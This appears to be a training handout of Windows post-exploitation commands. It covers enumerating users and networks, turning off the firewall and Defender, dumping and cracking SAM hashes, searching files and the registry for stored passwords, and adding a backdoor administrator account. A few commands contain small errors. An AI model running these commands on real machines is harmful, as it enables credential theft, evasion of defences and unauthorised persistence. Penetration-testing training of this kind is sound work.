This activity is intended to guide you with some basic manual reconnaissance activity.

Windows Local user & local enumeration

1. Check the current user

  • echo %USERNAME% || whoami
  • whoami


  • env:username

2. View the logged in user privileges

  • whoami /priv

3. Display the user groups to which the current user belongs.

  • whoami /groups

4. See the local users

  • net user

Note: User1 is not listed as it is a Domain user

5. To view all users including local and domain users that have logged in to this machine

  • whoami /all

6. You can also see local users using powershell

  • Get-LocalUser
  • Get-LocalUser | Select-Object -Property Name,Enabled,LastLogon

7. We could also get usernames by inspecting the users’ directory (C:/Users)

  • Get-ChildItem C:/Users -Force
  • Get-ChildItem C:/Users -Force | Select Name

8. The "Net Accounts" command is used to set the policy settings on local computer, such as Account policies and password policies. This command can't be used on domain controller. This command is only used on local computer.

  • net accounts

9. Learn more about a specific local user

  • net user administrator

10. net localgroup displays the name of the server and the names of local groups on the computer.

  • net localgroup

11. you can also get the local groups using Powershell

  • Get-LocalGroup
  • Get-LocalGroup | ft Name

12. You can also see the users that belong to a group

  • net localgroup administrators

13. You can also get user membership using powershell

  • Get-LocalGroupMember Administrators
  • Get-LocalGroupMember Administrators | ft Name,PrincipalSource

Get Folder permissions

1. To get folder permissions in powershell use

  • (get-acl .\test-dir\).access
  • (get-acl .\test-dir\).access | ft IdentityReference, FileSystemRights, AccessControlType

2. You can use CMD to check on folder permissions

  • icacls .\test-dir


1. To know the network information of the PC you can run

  • ipconfig
  • ipconfig /all

2. This can also be achieved from Powershell

  • Get-NetIPConfiguration
  • Get-NetIPConfiguration | ft InterfaceAlias, InterfaceDescription, IPv4Address

3. Get DNS information

  • Get-DnsClientServerAddress
  • Get-DnsClientServerAddress -AddressFamily IPv4
  • Get-DnsClientServerAddress -AddressFamily IPv4 | ft ServerAddresses

Note: In some environments it is normal to see the AD server act as DNS server too.

4. Display routing table

  • route print

5. Get more routing information from the host

  • Get-NetRoute
  • Get-NetRoute -AddressFamily IPv4
  • Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix, NextHop, RouteMetric, ifIndex

6. Know about the ARP table, IP and MAC addresses in the network

  • arp -A

7. We can also get ARP table using

  • Get-NetNeighbor
  • Get-NetNeighbor -AddressFamily IPv4
  • Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex, IPAddress, LinkLayerAddress, State

8. We can get information about who is currently connected to our PC, and the process ID PID

  • netstat -ano

9. Check the state of the local Firewall configuration

  • netsh firewall show status

10. Now check the current firewall configuration

  • netsh firewall show config


As soon as you get local administrator you can disable FW and AV to do other stuff.

11. To disable the Firewall you can run (requires administrator privileges)

  • netsh firewall set opmode disable

12. Set all profiles to off (requires administrator privileges)

  • netsh advfirewall set allprofiles state off


1. You can check the Malware Protection status

  • Get-MpComputerStatus

2. After checking the AV info you can check for the FW domain status

  • netsh advfirewall show domain

Note: To read the Firewall logs you need administrator rights

3. You can also print all profiles Domain, Private & Public

  • netsh advfirewall show allprofiles

4. To disable AV run the following (you need administrator permissions)

  • Set-MpPreference -DisableRealtimeMonitoring $true

5. Also, you can disable the IOAVprotection using (requires admin rights)

  • Set-MpPreference -DisableIOAVProtection $true

6. You can check the AV rules

  • $a = Get-ApplockerPolicy -effective
  • $a.rulescollections

Find Passwords

The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.

  • # Usually %SYSTEMROOT% = C:\Windows
  • %SYSTEMROOT%\repair\SAM
  • %SYSTEMROOT%\System32\config\RegBack\SAM
  • %SYSTEMROOT%\System32\config\SAM
  • %SYSTEMROOT%\repair\system
  • %SYSTEMROOT%\System32\config\SYSTEM
  • %SYSTEMROOT%\System32\config\RegBack\system

Generate a hash file for John using pwdump or samdump2.

  • pwdump SYSTEM SAM > /root/sam.txt
  • samdump2 SYSTEM SAM -o sam.txt

Then crack it with john -format=NT /root/sam.txt.

1. You can copy and crack the following files

  • C:\windows\system32\config\SAM
  • C:\windows\system32\config\SYSTEM

2. Locate passwords in unattend.xml files.

  • C:\unattend.xml
  • C:\Windows\Panther\Unattend.xml
  • C:\Windows\Panther\Unattend\Unattend.xml
  • C:\Windows\system32\sysprep.inf
  • C:\Windows\system32\sysprep\sysprep.xml

Display the content of these files with

  • dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>null

Note: The Metasploit module post/windows/gather/enum_unattend looks for these files.

Search for files

1. Search for a keyword in any file, and open it (CMD)

  • findstr /spin "password" *.*

2. Also search for files containing the word password in its contents

  • cd c:\ & FINDSTR /SI /M "password" *.xml *.txt *.ini *.config
  • findstr /si password *.xml *.ini *.txt *.config

3. Search for files based on their name

  • dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

4. Also search for files that have a specific name (CMD)

  • where /R C:\ file-test.txt
  • where /R C:\ *.ini

Search/Find Registry

1. Search within the registry for keywords (usernames & passwords)

  • REG QUERY HKLM /F "password" /t REG_SZ /S /K
  • REG QUERY HKLM /F "pass" /t REG_SZ /S /K
  • REG QUERY HKCU /F "password" /t REG_SZ /S /K
  • REG QUERY HKCU /F "pass" /t REG_SZ /S /K

2. Search for usernames

  • REG QUERY HKLM /F "username" /t REG_SZ /S /K
  • REG QUERY HKLM /F "user" /t REG_SZ /S /K
  • REG QUERY HKCU /F "username" /t REG_SZ /S /K
  • REG QUERY HKCU /F "user" /t REG_SZ /S /K

3. Other searches

  • reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
  • reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
  • reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
  • reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
  • reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
  • reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

4. Read the value of certain sub key

  • REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList

IIS Web config

  • Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
  • C:\inetpub\wwwroot\web.config

Other files

  • %SYSTEMDRIVE%\pagefile.sys
  • %WINDIR%\debug\NetSetup.log
  • %WINDIR%\repair\sam
  • %WINDIR%\repair\system
  • %WINDIR%\repair\software, %WINDIR%\repair\security
  • %WINDIR%\iis6.log
  • %WINDIR%\system32\config\AppEvent.Evt
  • %WINDIR%\system32\config\SecEvent.Evt
  • %WINDIR%\system32\config\default.sav
  • %WINDIR%\system32\config\security.sav
  • %WINDIR%\system32\config\software.sav
  • %WINDIR%\system32\config\system.sav
  • %WINDIR%\system32\CCM\logs\*.log
  • %USERPROFILE%\ntuser.dat
  • %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
  • %WINDIR%\System32\drivers\etc\hosts
  • C:\ProgramData\Configs\*
  • C:\Program Files\Windows PowerShell\*
  • dir c:*vnc.ini /s /b
  • dir c:*ultravnc.ini /s /b

System Information

1. You can check for Windows details (including patching info) using Systeminfo

  • systeminfo

2. You can also filter this out

  • systeminfo | FINDSTR /B /C:"OS Name" /C:"OS Version"

3. Search for patching information

  • wmic qfe

Persistance add user

When you become administrator, you can add users with administrator privileges

1. Add a user

  • net user /add puser1 Password123

2. Add it to the group

  • net localgroup administrators puser1 /add

Schedule tasks

With schedule tasks you can add/ modify a script to do what you need

1. Display schedule tasks

  • Get-ScheduleTask